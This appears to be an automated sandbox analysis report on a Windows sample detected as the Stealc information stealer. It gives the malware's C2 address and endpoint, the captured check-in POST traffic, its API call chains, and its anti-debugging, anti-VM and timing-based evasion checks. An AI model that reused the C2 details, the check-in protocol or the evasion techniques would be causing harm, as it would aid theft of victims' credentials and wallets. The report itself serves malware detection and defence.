Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1533036
MD5: e12ed88e4c214b23dfbd11ea91d2ece8
SHA1: 2a76376af58e1a12f2947de272a3e6ebb8174fe4
SHA256: 6ab0865ecbaf0e450e68a7d866f036113b50ae6edff09b1f0e41c2514cf72233
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6444 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E12ED88E4C214B23DFBD11EA91D2ECE8)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2182541833.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6444 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6444 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.540000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-14T11:03:08.697679+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.540000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 44%
Source: file.exe | Virustotal: Detection: 51%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00547240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00549AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00549B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00558EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii (211-byte multipart body; line breaks are the CRLFs of the raw capture):
------ECGIIIDAKJDHJKFHIEBF
Content-Disposition: form-data; name="hwid"

F0B848BA18AD2322695909
------ECGIIIDAKJDHJKFHIEBF
Content-Disposition: form-data; name="build"

doma
------ECGIIIDAKJDHJKFHIEBF--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00544880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers and multipart body as the POST listed above)
Source: file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2223874889.0000000001294000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn9fv&
Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phptop
Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz9jv%
Source: file.exe, 00000000.00000002.2223874889.0000000001278000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2223874889.000000000121E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37e

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081A01F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BE9D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091192A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D6A6C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00916A85
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A7ADC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090AA56
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081CA65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009073B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091332F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090ECD6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00905CF0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00914CFF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00909455
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2C5AE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008115F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00984D41
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090FE5F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E8E4B
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005445C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: qydepkqh ZLIB complexity 0.9947846029234478
Source: file.exe, 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2182541833.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00553720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\A2EDFAKR.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 44%
Source: file.exe | Virustotal: Detection: 51%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1854976 > 1048576
Source: file.exe | Static PE information: Raw size of qydepkqh is bigger than: 0x100000 < 0x19ec00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qydepkqh:EW;zugntyrx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qydepkqh:EW;zugntyrx:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cb16f should be: 0x1d0d3d
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: qydepkqh
Source: file.exe | Static PE information: section name: zugntyrx
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AC8DA push ebx; mov dword ptr [esp], edi | 0_2_009AC91C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055B035 push ecx; ret | 0_2_0055B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B88F6 push edx; mov dword ptr [esp], ecx | 0_2_009B894A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DD0F0 push 365ABF76h; mov dword ptr [esp], ebp | 0_2_009DD118
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097A0E4 push edx; mov dword ptr [esp], esi | 0_2_0097A0E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0085800F push edx; mov dword ptr [esp], ebp | 0_2_00858038
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DA810 push ecx; mov dword ptr [esp], 19CBE1CBh | 0_2_009DAB85
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081A01F push edx; mov dword ptr [esp], edi | 0_2_0081A158
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081A01F push 03655A98h; mov dword ptr [esp], edx | 0_2_0081A1A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081A01F push eax; mov dword ptr [esp], ebx | 0_2_0081A1E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C405D push 57C43AEFh; mov dword ptr [esp], esp | 0_2_009C40A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00937047 push ebx; mov dword ptr [esp], ebp | 0_2_00937097
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00937047 push ebp; mov dword ptr [esp], ecx | 0_2_009370EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2D042 push 62CD203Ah; mov dword ptr [esp], eax | 0_2_00A2D07D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2D042 push esi; mov dword ptr [esp], ebp | 0_2_00A2D0FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B5076 push 6CD8DAC4h; mov dword ptr [esp], edi | 0_2_009B50E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F064 push ebx; mov dword ptr [esp], 38F61875h | 0_2_0093F093
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F064 push edi; mov dword ptr [esp], ebx | 0_2_0093F0C2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F064 push edx; mov dword ptr [esp], esi | 0_2_0093F0D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F064 push 3A89FF30h; mov dword ptr [esp], ecx | 0_2_0093F148
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00984066 push 0A4CE101h; mov dword ptr [esp], ebp | 0_2_009840AE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE01B5 push 34960141h; mov dword ptr [esp], esi | 0_2_00BE01CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE01B5 push 52E0838Ah; mov dword ptr [esp], eax | 0_2_00BE0297
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2C1B7 push 3C87B317h; mov dword ptr [esp], esi | 0_2_00A2C26B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CA18B push 0BD5C9A0h; mov dword ptr [esp], eax | 0_2_009CA1A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DB980 push 7C99EA9Bh; mov dword ptr [esp], edi | 0_2_009DB9DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009421AC push edx; mov dword ptr [esp], esi | 0_2_009421C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C51C5 push ecx; mov dword ptr [esp], esi | 0_2_009C5207
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD9FF push ecx; mov dword ptr [esp], esi | 0_2_009CDA10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD9FF push esi; mov dword ptr [esp], edx | 0_2_009CDA15
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD9FF push eax; mov dword ptr [esp], 7E77EDD3h | 0_2_009CDA26
Source: file.exe | Static PE information: section name: qydepkqh entropy: 7.953404552841359

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13671
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91C2D2 second address: 91C2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 906E57 second address: 906E8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ABh 0x00000007 jnp 00007F8FB8B0B4A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jno 00007F8FB8B0B4A6h 0x00000016 jmp 00007F8FB8B0B4B5h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91B83C second address: 91B869 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FB915C64Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8FB915C651h 0x00000013 jno 00007F8FB915C646h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91B869 second address: 91B87C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D5F9 second address: 91D5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D5FE second address: 91D603 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D603 second address: 91D630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2493h], ecx 0x00000010 push 00000000h 0x00000012 or edi, dword ptr [ebp+122D37D2h] 0x00000018 call 00007F8FB915C649h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push esi 0x00000021 pop esi 0x00000022 jc 00007F8FB915C646h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D630 second address: 91D671 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8FB8B0B4ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F8FB8B0B4B0h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F8FB8B0B4B0h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d je 00007F8FB8B0B4A8h 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D766 second address: 91D76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D81F second address: 91D82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB8B0B4ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D82F second address: 91D841 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F8FB915C646h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D841 second address: 91D851 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D851 second address: 91D857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D857 second address: 91D85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D85C second address: 91D861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D861 second address: 91D867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D867 second address: 91D87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b jno 00007F8FB915C646h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D87D second address: 91D881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D9D5 second address: 91D9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8FB915C646h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D9DF second address: 91D9F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F8FB8B0B4A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D9F1 second address: 91DA2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8FB915C655h 0x00000015 rdtsc
